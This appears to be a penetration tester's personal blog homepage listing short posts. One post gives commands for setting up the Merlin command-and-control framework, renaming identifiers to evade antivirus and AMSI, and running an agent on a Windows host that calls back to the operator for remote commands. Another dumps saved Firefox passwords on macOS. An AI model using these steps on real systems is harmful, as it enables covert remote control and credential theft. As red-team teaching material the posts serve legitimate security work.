Hi there, my name is Joost van ‘t Zand. This page serves as a bit of an overview of me and my online presence. I am currently working as a ethical hacker.

Projects

Blog posts

  • Test_page

  • C2 Using Merlin

    To use Merlin as a Command & Control server, which is written in golang, we should take the following steps:

    go version	-> version should be 1.13 or higher
    apt update && sudo apt install golang-go
    git clone https://github.com/Ne0nd0g/merlin && cd merlin
    
    
    ## Now replace ExecuteShell for MiniMice to trick virusscanners and AMSI
    ## and also hide Ne0nd0g for AMSI, as this is the developer
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/ExecuteShell/MiniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/executeShell/miniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g'
    sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' go.mod
    
    
    ## Create an output directory and build the Merlin agent
    make agent-windows DIR="./output"
    
    ## Start the Merlin server listener
    go run cmd/merlinserver/main.go -i 0.0.0.0 -p 8443 -psk strongPassphraseWhaterYouWant
    
    ## Run a python HTTP Server to copy the Merlin agent to the Windows system
    cd /mnt/tools/merlin/output/
    python -m SimpleHTTPServer 80
    
    ## Run the Merlin agent on the Windows host
    merlinAgent-Windows-x64.exe -url https://172.16.216.135:8443 -psk strongPassphraseWhaterYouWant
    [+]New authenticated agent checkin for a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
    
    ## Now we can interact with the agent:
    interact a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
    
    help
    ls
    info
    cmd whoami
  • Deploying Gophish In Docker With Terraform And Aws

    Here a video about how to deploy GoPhish in a Docker container on a VPS in AWS which is deployed using TerraForm

  • Dump Firefox Credentials On Macos

    Dumping the credentials stored in the Firefox browser cache on MacOS is possible using the following commands:

    git clone https://github.com/unode/firefox_decrypt
    cd firefox_decrypt
    python firefox_decrypt.py
    
    Select the Firefox profile you wish to decrypt
    1 -> Profiles/1v42l6gf.dev-edition-default
    2 -> Profiles/cunynfjm.default
    2
    
    Master Password for profile /Users/myuser/Library/Application Support/Firefox/Profiles/cunynfjm.default:
    2019-11-11 14:13:18,813 - WARNING - Attempting decryption with no Master Password
    
    Website:   https://www.hackthebox.eu
    Username: '<username>'
    Password: '******'
    
    Website:   http://webmail.mijndomein.nl
    Username: '<username>'
    Password: '******'
    
    Website:   https://www.t-mobile.nl
    Username: '<username>'
    Password: '******'
  • Welcome To My Blog

    Welcome……You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run jekyll serve, which launches a web server and auto-regenerates your site when a file is updated.

    To add new posts, simply add a file in the _posts directory that follows the convention YYYY-MM-DD-name-of-post.ext and includes the necessary front matter. Take a look at the source for this post to get an idea about how it works.

    Jekyll also offers powerful support for code snippets:

    def print_hi(name)
      puts "Hi, #{name}"
    end
    print_hi('Tom')
    #=> prints 'Hi, Tom' to STDOUT.

    Check out the Jekyll docs for more info on how to get the most out of Jekyll. File all bugs/feature requests at Jekyll’s GitHub repo. If you have questions, you can ask them on Jekyll Talk.